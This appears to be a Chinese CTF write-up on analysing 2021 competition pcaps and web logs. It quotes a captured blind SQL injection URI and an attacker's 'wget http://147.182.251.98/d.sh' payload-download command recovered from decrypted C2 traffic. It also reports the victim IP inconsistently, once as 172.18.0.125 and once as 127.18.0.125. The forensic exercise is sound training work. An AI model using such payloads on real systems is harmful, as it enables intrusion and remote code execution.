流量日志分析--实操

[鹤城杯 2021]流量分析

流量日志分析--实操_第1张图片

 

<--第一道流量分析不难,主要就是布尔盲注的流量包分析,直接查看http请求包即可我们可以通过观察看到注入成功的响应长度不同,这里成功的为978字节,失败的994字节.不要问为什么.其实也可以直接判断.978的流量比994的少了非常多 显然就是成功的(因为这里是获取ASCII码.所以判断成功的流量肯定更少)
所以我们只需要提取出这一部分成功的流量出来进行分析即可-->

流量日志分析--实操_第2张图片

 

<--使用过滤语法  frame.len == 978 过滤长度为978的包 然后导出为文本一定要先过滤再导出 不然就会把全部的导出-->

流量日志分析--实操_第3张图片 

 运行脚本:

import re

#Request URI: http://192.168.246.1/ctf/Less-5/?id=1'%20and%20ascii(substr((select%20flag%20#from%20t),1,1))=102--+
nums = []
obj1 = re.compile(r"1\)\)=(?P.*)\b",re.S)#开启贪婪模式匹配这里一定要使用.*贪婪模式 如果用.*?可能匹配失败 \b代表结尾
def getAscii():
    with open("re.txt", "r", encoding="utf-8") as f:
        for line in f.readlines():
            line = line.strip()
            result = obj1.finditer(line)
            for it in result:
                num = it.group("num1")
                nums.append(num)


def getflag():
    flag = ""
    for i in nums:
        i = chr(int(i))
        flag = flag + i
        print(flag)

if __name__ == '__main__':
    getAscii()
    getflag()

流量日志分析--实操_第4张图片

 [陇剑杯 2021]流量分析(问1)

[陇剑杯 2021]流量分析(问2)

[陇剑杯 2021]流量分析(问3)

流量日志分析--实操_第5张图片

 流量日志分析--实操_第6张图片

 

流量日志分析--实操_第7张图片

 

操作内容:
分析pcap流量包,主机ip应该是172.18.0.1,可以看到很多UDP协议的包。在看包内容的时候,注意到UDP包头都是P05=,而且有的是有base64,也有乱码的包。P05=后面都是00 00 00 00和01 00 00 00,其中00的长度是32、01的长度是16,可能是认证。

根据长度为16猜测可能是aes,用长度16的base64(即P05=后面是01 00 00 00的)作为aes key解密发现解密成功了,02 00 00 00对应的包里面都有一个可见字符,其中受害IP172.18.0.125有命令:wget http://147.182.251.98/d.sh;所以第一问为127.18.0.125,第二问密钥就是18217号包里的DtX0GScM9dwrgZht,第三问ip即为147.182.251.98(udp.stream eq 85)

流量日志分析--实操_第8张图片

 流量日志分析--实操_第9张图片

 

[陇剑杯 2021]日志分析(问1)

[陇剑杯 2021]日志分析(问2)

[陇剑杯 2021]日志分析(问3)

流量日志分析--实操_第10张图片

     这里我们直接搜索返回状态为200的流量,发现www.zip

流量日志分析--实操_第11张图片

流量日志分析--实操_第12张图片

 直接查找tmp即可看到。

流量日志分析--实操_第13张图片

 

流量日志分析--实操_第14张图片

同样的,在目录穿越反序列化的时候,已经显示出来了。

流量日志分析--实操_第15张图片

 

你可能感兴趣的:(作业,python)